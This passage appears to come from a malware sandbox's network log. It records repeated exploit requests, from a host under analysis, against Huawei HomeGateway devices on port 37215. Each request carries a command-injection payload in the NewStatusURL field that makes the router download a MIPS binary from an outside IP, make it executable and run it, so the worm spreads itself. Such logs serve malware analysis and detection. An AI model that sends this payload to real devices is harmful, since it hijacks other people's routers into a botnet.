                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1330192.168.2.1335338190.140.251.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456296921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1331192.168.2.135345041.172.246.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456307888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1332192.168.2.134364064.236.77.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456331968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1333192.168.2.1359172197.124.72.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456387997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1334192.168.2.1352354151.2.37.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456396103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1335192.168.2.1337260213.57.84.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456429958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1336192.168.2.1359912157.195.49.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456434011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1337192.168.2.1360302157.85.157.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456628084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1338192.168.2.1352714157.50.220.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456667900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1339192.168.2.133457041.89.90.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456751108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
